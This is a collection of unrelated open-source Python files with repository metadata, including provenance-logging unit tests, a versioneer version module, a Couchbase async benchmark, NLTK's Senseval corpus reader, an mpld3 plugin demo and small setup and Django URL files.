def test_Adds_code_or_logtext(self):
self.log('new', 'trans', 'old', code='abc', logtext='def')
self.assertEqual(self.provenancesAdded[0]['code'],'abc')
self.assertEqual(self.provenancesAdded[0]['logtext'],'def')
def test_Determines_user_and_logs_them(self):
self.users.determineUser.return_value = 'paprika'
self.log('new', 'trans', 'old', user='mononoko')
self.users.determineUser.assert_called_with('mononoko')
self.assertEqual(self.provenancesAdded[0]['user'],'paprika')
def test_Script_added_to_provenance(self):
parents = ['/p/f1']
new = '/p/f2'
trans = 'Something cool'
script = '/p/test.py'
self.log(new, trans, parents, script=script)
self.assertEqual(self.provenancesAdded[0]['script'], script)
def test_Accepts_and_processes_custom_provenance(self):
parents = ['/p/f1']
new = '/p/f2'
trans = 'Something cool'
p = {'akey':'avalue'}
self.log(new, trans, parents, provenance=p)
self.assertEqual(self.provenancesAdded[0]['akey'], 'avalue')
def test_Calls_reconfigureOrGetConfiguration_on_dependencies(self):
outOpts = Mock()
outOpts.dryrun = True
self.dependencies.reconfigureOrGetConfiguration.return_value = outOpts
provenance = self.log(['/p/f1'], 'bla', ['/p/f2'], transient=True)
self.dependencies.reconfigureOrGetConfiguration.assert_called_with(
self.opts)
def test_Can_pass_multiple_new_files(self):
parents = ['p1','p2']
new = ['/p/f2','/p/f3']
trans = 'Something cool'
self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
self.log(new, trans, parents)
self.assertEqual(self.provenancesAdded[0]['parents'], ['l:p1','l:p2'])
self.assertEqual(self.provenancesAdded[1]['parents'], ['l:p1','l:p2'])
def test_Add_parent_if_parent_unknown(self):
self.repo.byLocation.return_value = None
self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
provenance = self.log('new', 'trans', 'parentpath')
self.add.assert_any_call('l:parentpath', dependencies=self.dependencies)
self.listener.addUnknownParent.assert_called_with('l:parentpath')
def test_Uses_validated_location_for_parent_lookup(self):
self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
provenance = self.log('new', 'trans', 'parentpath')
self.repo.byLocation.assert_called_with('l:parentpath')
def test_Inherits_from_parent(self):
parent = Mock()
parent.provenance = {'x':123}
inprov = {'a':89}
self.repo.byLocation.return_value = parent
self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
img = self.log('new', 'trans', 'parentpath', provenance=inprov)
self.inheritFrom.assert_called_with(inprov, parent.provenance)
def test_If_parent_unknown_uses_add_return_value(self):
"""In this case the parent provenance should be obtained from
what add() returns.
"""
self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
inprov = {'a':89}
self.repo.byLocation.return_value = None
img = self.log('new', 'trans', 'parentpath', provenance=inprov)
## add function is mocked to set 'acquired' field to location passed
self.inheritFrom.assert_called_with(inprov, {'parentfield':'l:parentpath'})
| {
"content_hash": "c39cc670012dac18c12c5806829a9102",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 94,
"avg_line_length": 41.94615384615385,
"alnum_prop": 0.6246103062534385,
"repo_name": "ilogue/niprov",
"id": "b612b1108647121b61fa51d9ef200bca1651f157",
"size": "5453",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_logging.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1187"
},
{
"name": "HTML",
"bytes": "2160"
},
{
"name": "JavaScript",
"bytes": "16060"
},
{
"name": "Mako",
"bytes": "6445"
},
{
"name": "Python",
"bytes": "327793"
},
{
"name": "Shell",
"bytes": "309"
}
],
"symlink_target": ""
} |
import errno
import os
import re
import subprocess
import sys
def get_keywords():
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
keywords = {"refnames": git_refnames, "full": git_full}
return keywords
class VersioneerConfig:
pass
def get_config():
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "distributed_frontera-"
cfg.versionfile_source = "distributed_frontera/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
pass
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
def decorate(f):
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
# Source tarballs conventionally unpack into a directory that includes
# both the project name and a version string.
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%s', but '%s' doesn't start with "
"prefix '%s'" % (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs-tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
# this runs 'git' from the root of the source tree. This only gets called
# if the git-archive 'subst' keywords were *not* expanded, and
# _version.py hasn't already been rewritten with a short version string,
# meaning we're inside a checked out source tree.
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %s" % root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag, this yields TAG-NUM-gHEX[-dirty]
# if there are no tags, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long"],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def plus_or_dot(pieces):
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
# now build up version string, with post-release "local version
# identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
# get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
# exceptions:
# 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
# TAG[.post.devDISTANCE] . No -dirty
# exceptions:
# 1: no tags. 0.post.devDISTANCE
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
# TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that
# .dev0 sorts backwards (a dirty tree will appear "older" than the
# corresponding clean one), but you shouldn't be releasing software with
# -dirty anyways.
# exceptions:
# 1: no tags. 0.postDISTANCE[.dev0]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
# TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty.
# exceptions:
# 1: no tags. 0.postDISTANCE[.dev0]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
# TAG[-DISTANCE-gHEX][-dirty], like 'git describe --tags --dirty
# --always'
# exceptions:
# 1: no tags. HEX[-dirty] (note: no 'g' prefix)
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
# TAG-DISTANCE-gHEX[-dirty], like 'git describe --tags --dirty
# --always -long'. The distance/hash is unconditional.
# exceptions:
# 1: no tags. HEX[-dirty] (note: no 'g' prefix)
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
def get_versions():
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree"}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version"}
| {
"content_hash": "1d7cb9a54410cd6020ee52adf27373f6",
"timestamp": "",
"source": "github",
"line_count": 450,
"max_line_length": 79,
"avg_line_length": 34.03777777777778,
"alnum_prop": 0.5720441339687928,
"repo_name": "stejesh/distributed-frontera",
"id": "b4fca205550b7d183b1ac4b818e04f2bedd5547c",
"size": "15792",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "distributed_frontera/_version.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "148237"
}
],
"symlink_target": ""
} |
"""Unit test package for BitcoinExchangeFH."""
| {
"content_hash": "5dc69bdf7f93ff009e4e4ba1b1e43fbd",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 46,
"avg_line_length": 47,
"alnum_prop": 0.7446808510638298,
"repo_name": "gavincyi/BitcoinExchangeFH",
"id": "88e5dd36f1d2d6b05bb79a680ba0bd7cbc6a4205",
"size": "72",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "202087"
}
],
"symlink_target": ""
} |
try:
import asyncio
except ImportError:
import trollius
asyncio = trollius
import argparse
from time import time
from couchbase.user_constants import FMT_BYTES
from couchbase.experimental import enable; enable()
from acouchbase.bucket import Bucket
ap = argparse.ArgumentParser()
ap.add_argument('-t', '--threads', default=4, type=int,
help="Number of threads to spawn. 0 means no threads "
"but workload will still run in the main thread")
ap.add_argument('-d', '--delay', default=0, type=float,
help="Number of seconds to wait between each op. "
"may be a fraction")
ap.add_argument('-p', '--password', default=None, type=str)
ap.add_argument('-U', '--connstr', default='couchbase://localhost/default', type=str)
ap.add_argument('-D', '--duration', default=10, type=int,
help="Duration of run (in seconds)")
ap.add_argument('--ksize', default=12, type=int,
help="Key size to use")
ap.add_argument('--vsize', default=128, type=int,
help="Value size to use")
ap.add_argument('-g', '--global-instance',
help="Use global instance", default=False,
action='store_true')
ap.add_argument('--batch', '-N', type=int, help="Batch size", default=1)
options = ap.parse_args()
GLOBAL_INSTANCE = None
CONN_OPTIONS = {'connstr': options.connstr}
def make_instance():
global GLOBAL_INSTANCE
if options.global_instance:
if not GLOBAL_INSTANCE:
GLOBAL_INSTANCE = Bucket(**CONN_OPTIONS)
return GLOBAL_INSTANCE
else:
return Bucket(**CONN_OPTIONS)
class Worker(object):
def __init__(self):
self.delay = options.delay
self.key = 'K' * options.ksize
self.value = b'V' * options.vsize
self.kv = {}
for x in range(options.batch):
self.kv[self.key + str(x)] = self.value
self.wait_time = 0
self.opcount = 0
try:
exec('''
@asyncio.coroutine
def run(self):
self.end_time = time() + options.duration
cb = make_instance()
yield from cb.connect()
while time() < self.end_time:
begin_time = time()
yield from cb.upsert_multi(self.kv, format=FMT_BYTES)
self.wait_time += time() - begin_time
self.opcount += options.batch
''')
except SyntaxError:
@asyncio.coroutine
def run(self):
self.end_time = time() + options.duration
cb = make_instance()
yield trollius.From(cb.connect())
while time() < self.end_time:
begin_time = time()
yield trollius.From(cb.upsert_multi(self.kv, format=FMT_BYTES))
self.wait_time += time() - begin_time
self.opcount += options.batch
global_begin = None
tasks = []
worker_threads = []
loop = asyncio.get_event_loop()
for x in range(options.threads):
w = Worker()
worker_threads.append(w)
tasks.append(asyncio.async(w.run()))
global_begin = time()
loop.run_until_complete(asyncio.wait(tasks))
global_duration = time() - global_begin
total_ops = sum([w.opcount for w in worker_threads])
total_time = 0
for t in worker_threads:
total_time += t.wait_time
print("Total run took an absolute time of %0.2f seconds" % (global_duration,))
print("Did a total of %d operations" % (total_ops,))
print("Total wait time of %0.2f seconds" % (total_time,))
print("[WAIT] %0.2f ops/second" % (float(total_ops)/float(total_time),))
print("[ABS] %0.2f ops/second" % (float(total_ops)/float(global_duration),))
| {
"content_hash": "0fa17f031b551129389a4596898104cf",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 85,
"avg_line_length": 30.982758620689655,
"alnum_prop": 0.6160267111853088,
"repo_name": "mnunberg/couchbase-python-client",
"id": "47b2449114c321eaacc99bbba9c8da1c5e3d0098",
"size": "4221",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/abench.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "261401"
},
{
"name": "Python",
"bytes": "428174"
}
],
"symlink_target": ""
} |
"""
Read from the Senseval 2 Corpus.
SENSEVAL [http://www.senseval.org/]
Evaluation exercises for Word Sense Disambiguation.
Organized by ACL-SIGLEX [http://www.siglex.org/]
Prepared by Ted Pedersen <tpederse@umn.edu>, University of Minnesota,
http://www.d.umn.edu/~tpederse/data.html
Distributed with permission.
The NLTK version of the Senseval 2 files uses well-formed XML.
Each instance of the ambiguous words "hard", "interest", "line", and "serve"
is tagged with a sense identifier, and supplied with context.
"""
from __future__ import print_function, unicode_literals
import re
from xml.etree import ElementTree
from nltk import compat
from nltk.tokenize import *
from nltk.corpus.reader.util import *
from nltk.corpus.reader.api import *
@compat.python_2_unicode_compatible
class SensevalInstance(object):
def __init__(self, word, position, context, senses):
self.word = word
self.senses = tuple(senses)
self.position = position
self.context = context
def __repr__(self):
return ('SensevalInstance(word=%r, position=%r, '
'context=%r, senses=%r)' %
(self.word, self.position, self.context, self.senses))
class SensevalCorpusReader(CorpusReader):
def instances(self, fileids=None):
return concat([SensevalCorpusView(fileid, enc)
for (fileid, enc) in self.abspaths(fileids, True)])
def raw(self, fileids=None):
"""
:return: the text contents of the given fileids, as a single string.
"""
if fileids is None: fileids = self._fileids
elif isinstance(fileids, compat.string_types): fileids = [fileids]
return concat([self.open(f).read() for f in fileids])
def _entry(self, tree):
elts = []
for lexelt in tree.findall('lexelt'):
for inst in lexelt.findall('instance'):
sense = inst[0].attrib['senseid']
context = [(w.text, w.attrib['pos'])
for w in inst[1]]
elts.append( (sense, context) )
return elts
class SensevalCorpusView(StreamBackedCorpusView):
def __init__(self, fileid, encoding):
StreamBackedCorpusView.__init__(self, fileid, encoding=encoding)
self._word_tokenizer = WhitespaceTokenizer()
self._lexelt_starts = [0] # list of streampos
self._lexelts = [None] # list of lexelt names
def read_block(self, stream):
# Decide which lexical element we're in.
lexelt_num = bisect.bisect_right(self._lexelt_starts, stream.tell())-1
lexelt = self._lexelts[lexelt_num]
instance_lines = []
in_instance = False
while True:
line = stream.readline()
if line == '':
assert instance_lines == []
return []
# Start of a lexical element?
if line.lstrip().startswith('<lexelt'):
lexelt_num += 1
m = re.search('item=("[^"]+"|\'[^\']+\')', line)
assert m is not None # <lexelt> has no 'item=...'
lexelt = m.group(1)[1:-1]
if lexelt_num < len(self._lexelts):
assert lexelt == self._lexelts[lexelt_num]
else:
self._lexelts.append(lexelt)
self._lexelt_starts.append(stream.tell())
# Start of an instance?
if line.lstrip().startswith('<instance'):
assert instance_lines == []
in_instance = True
# Body of an instance?
if in_instance:
instance_lines.append(line)
# End of an instance?
if line.lstrip().startswith('</instance'):
xml_block = '\n'.join(instance_lines)
xml_block = _fixXML(xml_block)
inst = ElementTree.fromstring(xml_block)
return [self._parse_instance(inst, lexelt)]
def _parse_instance(self, instance, lexelt):
senses = []
context = []
position = None
for child in instance:
if child.tag == 'answer':
senses.append(child.attrib['senseid'])
elif child.tag == 'context':
context += self._word_tokenizer.tokenize(child.text)
for cword in child:
if cword.tag == 'compound':
cword = cword[0] # is this ok to do?
if cword.tag == 'head':
# Some santiy checks:
assert position is None, 'head specified twice'
assert cword.text.strip() or len(cword)==1
assert not (cword.text.strip() and len(cword)==1)
# Record the position of the head:
position = len(context)
# Addd on the head word itself:
if cword.text.strip():
context.append(cword.text.strip())
elif cword[0].tag == 'wf':
context.append((cword[0].text,
cword[0].attrib['pos']))
if cword[0].tail:
context += self._word_tokenizer.tokenize(
cword[0].tail)
else:
assert False, 'expected CDATA or wf in <head>'
elif cword.tag == 'wf':
context.append((cword.text, cword.attrib['pos']))
elif cword.tag == 's':
pass # Sentence boundary marker.
else:
print('ACK', cword.tag)
assert False, 'expected CDATA or <wf> or <head>'
if cword.tail:
context += self._word_tokenizer.tokenize(cword.tail)
else:
assert False, 'unexpected tag %s' % child.tag
return SensevalInstance(lexelt, position, context, senses)
def _fixXML(text):
"""
Fix the various issues with Senseval pseudo-XML.
"""
# <~> or <^> => ~ or ^
text = re.sub(r'<([~\^])>', r'\1', text)
# fix lone &
text = re.sub(r'(\s+)\&(\s+)', r'\1&\2', text)
# fix """
text = re.sub(r'"""', '\'"\'', text)
# fix <s snum=dd> => <s snum="dd"/>
text = re.sub(r'(<[^<]*snum=)([^">]+)>', r'\1"\2"/>', text)
# fix foreign word tag
text = re.sub(r'<\&frasl>\s*<p[^>]*>', 'FRASL', text)
# remove <&I .>
text = re.sub(r'<\&I[^>]*>', '', text)
# fix <{word}>
text = re.sub(r'<{([^}]+)}>', r'\1', text)
# remove <@>, <p>, </p>
text = re.sub(r'<(@|/?p)>', r'', text)
# remove <&M .> and <&T .> and <&Ms .>
text = re.sub(r'<&\w+ \.>', r'', text)
# remove <!DOCTYPE... > lines
text = re.sub(r'<!DOCTYPE[^>]*>', r'', text)
# remove <[hi]> and <[/p]> etc
text = re.sub(r'<\[\/?[^>]+\]*>', r'', text)
# take the thing out of the brackets: <…>
text = re.sub(r'<(\&\w+;)>', r'\1', text)
# and remove the & for those patterns that aren't regular XML
text = re.sub(r'&(?!amp|gt|lt|apos|quot)', r'', text)
# fix 'abc <p="foo"/>' style tags - now <wf pos="foo">abc</wf>
text = re.sub(r'[ \t]*([^<>\s]+?)[ \t]*<p="([^"]*"?)"/>',
r' <wf pos="\2">\1</wf>', text)
text = re.sub(r'\s*"\s*<p=\'"\'/>', " <wf pos='\"'>\"</wf>", text)
return text
| {
"content_hash": "1a6e84b3f4a3c579771079ac07865411",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 78,
"avg_line_length": 39.91752577319588,
"alnum_prop": 0.49393078512396693,
"repo_name": "enriquesanchezb/practica_utad_2016",
"id": "6ac715cf3ad5a38eceb0a835c2fb44d490a5d142",
"size": "8019",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "5785"
},
{
"name": "HTML",
"bytes": "284450"
},
{
"name": "JavaScript",
"bytes": "20876"
},
{
"name": "Python",
"bytes": "6659896"
},
{
"name": "Shell",
"bytes": "3296"
}
],
"symlink_target": ""
} |
"""Test the custom plugin demoed on
http://jakevdp.github.io/blog/2014/01/10/d3-plugins-truly-interactive/
"""
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpld3_rewrite import plugins, utils
import jinja2
import json
class LinkedView(plugins.PluginBase):
"""A simple plugin showing how multiple axes can be linked"""
JAVASCRIPT = """
var LinkedViewPlugin = function(fig, prop){
this.fig = fig;
this.prop = mpld3.process_props(this, prop, {},
["idpts", "idline", "data"]);
}
LinkedViewPlugin.prototype.draw = function(){
var pts = mpld3.get_element(this.prop.idpts);
var line = mpld3.get_element(this.prop.idline);
var data = this.prop.data;
function mouseover(d, i){
line.data = data[i];
line.elements().transition()
.attr("d", line.datafunc(line.data))
.style("stroke", this.style.fill);
}
pts.elements().on("mouseover", mouseover);
};
mpld3.register_plugin("linkedview", LinkedViewPlugin);
"""
def __init__(self, points, line, linedata):
if isinstance(points, matplotlib.lines.Line2D):
suffix = "pts"
else:
suffix = None
self.dict_ = {"type": "linkedview",
"idpts": utils.get_id(points, suffix),
"idline": utils.get_id(line),
"data": linedata}
def main():
fig, ax = plt.subplots(2)
# scatter periods and amplitudes
np.random.seed(0)
P = 0.2 + np.random.random(size=20)
A = np.random.random(size=20)
x = np.linspace(0, 10, 100)
data = np.array([[x, Ai * np.sin(x / Pi)]
for (Ai, Pi) in zip(A, P)])
points = ax[1].scatter(P, A, c=P + A,
s=200, alpha=0.5)
ax[1].set_xlabel('Period')
ax[1].set_ylabel('Amplitude')
# create the line object
lines = ax[0].plot(x, 0 * x, '-w', lw=3, alpha=0.5)
ax[0].set_ylim(-1, 1)
ax[0].set_title("Hover over points to see lines")
# transpose line data and add plugin
linedata = data.transpose(0, 2, 1).tolist()
plugins.connect(fig, LinkedView(points, lines[0], linedata))
return fig
if __name__ == '__main__':
main()
plt.show()
| {
"content_hash": "0ea2e4426f99e70cea25985fc461da7f",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 70,
"avg_line_length": 28.9125,
"alnum_prop": 0.5685257241677475,
"repo_name": "mpld3/mpld3_rewrite",
"id": "c51cf3a02f819d841b5325ea5eaa1bc2841a8d14",
"size": "2313",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_plots/test_custom_plugin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "42908"
},
{
"name": "Python",
"bytes": "62387"
}
],
"symlink_target": ""
} |
from setuptools import setup
from g1.devtools import buildtools
setup(
name='g1.files',
cmdclass={
'bdist_zipapp': buildtools.make_bdist_zipapp(main_optional=True),
},
packages=[
'g1.files',
],
install_requires=[
'g1.bases',
],
zip_safe=False,
)
| {
"content_hash": "22279c88ef776f073907502762956cfa",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 73,
"avg_line_length": 17.88235294117647,
"alnum_prop": 0.5921052631578947,
"repo_name": "clchiou/garage",
"id": "bbf09a54081b4a835093dbfb9320e73b64787965",
"size": "304",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/g1/files/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cap'n Proto",
"bytes": "6917"
},
{
"name": "HTML",
"bytes": "113"
},
{
"name": "Java",
"bytes": "61027"
},
{
"name": "Python",
"bytes": "1653733"
},
{
"name": "Shell",
"bytes": "6209"
}
],
"symlink_target": ""
} |
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from views import TodoItemViewSet
__author__ = "wangyixiang"
dr = DefaultRouter()
dr.register("item", TodoItemViewSet)
urlpatterns = [
url(r'^', include(dr.urls)),
]
| {
"content_hash": "e9c388bc46a9b543fa7e47604be991e2",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 48,
"avg_line_length": 22,
"alnum_prop": 0.7424242424242424,
"repo_name": "wangyixiang/sstest",
"id": "a807f4380f7fab5586a59e4658cd60862998fc92",
"size": "311",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "todo-django/mydjango/todo_webapi/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "43141"
},
{
"name": "Go",
"bytes": "20020"
},
{
"name": "HTML",
"bytes": "3828"
},
{
"name": "JavaScript",
"bytes": "307920"
},
{
"name": "Nginx",
"bytes": "1449"
},
{
"name": "Python",
"bytes": "6648"
}
],
"symlink_target": ""
} |
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
